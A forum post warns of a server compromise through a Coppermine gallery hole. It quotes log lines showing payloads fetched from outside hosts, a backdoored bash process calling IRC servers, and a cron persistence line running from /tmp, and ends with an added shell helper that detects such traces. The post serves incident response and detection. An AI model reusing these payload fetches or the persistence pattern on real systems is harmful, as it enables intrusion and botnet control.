Gallery hack
Posted: 08 Feb 2009, 12:36
Hi,
since my server was hacked overnight through the same gallery we use on PFS, I'll take the liberty of warning everyone (and the admin above all).
In the apache error_log there was this:
--2009-02-08 06:08:26-- http://iceman.ro/20.txt
Resolving iceman.ro... 85.204.4.215
Connecting to iceman.ro|85.204.4.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17836 (17K) [text/plain]
Saving to: `/tmp/20.txt'
0K .......... ....... 100% 138K=0.1s
2009-02-08 06:08:27 (138 KB/s) - `/tmp/20.txt' saved [17836/17836]
kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
--2009-02-08 06:47:53-- http://naughtyvibez.at/nou
Resolving naughtyvibez.at... 84.16.255.129
Connecting to naughtyvibez.at|84.16.255.129|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10920 (11K) [text/plain]
Saving to: `nou'
0K .......... 100% 403K=0.03s
2009-02-08 06:47:54 (403 KB/s) - `nou' saved [10920/10920]
In /tmp/ were both of the downloaded files, plus a running "updater" which, whenever the infected bash was killed, restarted it, and whenever a fresh one was loaded, infected it again.
So if
netstat -tupan | grep bash
shows anything, I would definitely pay close attention. It is some kind of backdoor waiting to be controlled from the other side and, fortunately, it runs "only" with apache's privileges and not root's.
The gallery security update has been available since 4 February on the web at
http://coppermine-gallery.net/
Vlada
P.S. Sample
[root@obelix ~]# netstat -tupan | grep bash
tcp 0 1 192.168.0.1:55234 195.47.220.2:7000 SYN_SENT 7075/bash
tcp 0 1 192.168.0.1:39617 193.109.122.67:6667 SYN_SENT 7075/bash
tcp 0 1 192.168.1.1:44711 194.109.20.90:6663 SYN_SENT 7075/bash
tcp 0 1 192.168.2.1:52110 194.109.20.90:6667 SYN_SENT 7075/bash
tcp 0 1 10.0.0.1:36673 193.109.122.67:7000 SYN_SENT 7075/bash
tcp 0 1 192.168.2.1:60393 194.109.20.90:6660 SYN_SENT 7075/bash
tcp 0 1 192.168.1.1:43627 195.47.220.2:6667 SYN_SENT 7075/bash
tcp 0 1 10.0.0.1:54075 195.68.221.221:6667 SYN_SENT 7075/bash
udp 0 0 0.0.0.0:60271 0.0.0.0:* 7075/bash
OBELIX:~# cat /var/spool/cron/apache
* * * * * /tmp/.INEX-INST/update >/dev/null 2>&1
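As an added triage example (not part of the post), a small POSIX shell helper that re-implements the `netstat -tupan | grep bash` check in a form that can be run offline against sample output, and also looks for crontab entries that run commands out of /tmp-style directories, as the apache crontab above did. The sample netstat and crontab lines are constructed, modelled on the listing above; `check_host` is an assumed wrapper for running it live.

```sh
#!/bin/sh
# Added triage helper, not from the original post. Flags shell processes that
# hold non-listening sockets (the pattern in the post: a bash process with
# outbound SYN_SENT connections to IRC-style ports) and crontab lines whose
# command lives in a world-writable directory.

# Constructed sample of `netstat -tupan` output (not a live capture).
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1234/httpd
tcp 0 1 192.168.0.1:55234 195.47.220.2:7000 SYN_SENT 7075/bash
tcp 0 1 192.168.0.1:39617 193.109.122.67:6667 SYN_SENT 7075/bash
udp 0 0 0.0.0.0:60271 0.0.0.0:* 7075/bash
tcp 0 0 192.168.0.1:22 10.0.0.5:51000 ESTABLISHED 900/sshd'

# Constructed sample of the apache user's crontab (one bad line, one benign).
SAMPLE_CRON='* * * * * /tmp/.INEX-INST/update >/dev/null 2>&1
0 3 * * * /usr/local/bin/rotate-thumbs'

# suspicious_sockets: reads netstat output on stdin, prints "pid remote" for
# every socket owned by bash or sh that is neither LISTEN nor unconnected.
# Fields: 1 proto, 5 foreign address, 6 state, last = PID/Program name.
suspicious_sockets() {
    awk '$NF ~ /\/(ba)?sh$/ && $6 != "LISTEN" && $5 != "0.0.0.0:*" {
        split($NF, p, "/"); print p[1], $5
    }'
}

# suspicious_cron: reads crontab lines on stdin, prints those whose command
# (field 6, after the five schedule fields) lives under /tmp, /var/tmp
# or /dev/shm, the locations a web-user compromise can usually write to.
suspicious_cron() {
    awk '$6 ~ /^\/(tmp|var\/tmp|dev\/shm)\//'
}

# count_lines: number of non-empty lines on stdin (0 when there are none).
count_lines() { grep -c . || true; }

# check_host: run both checks against the live system (assumed wrapper;
# needs netstat and permission to read the apache crontab).
check_host() {
    netstat -tupan 2>/dev/null | suspicious_sockets
    crontab -u apache -l 2>/dev/null | suspicious_cron
}
```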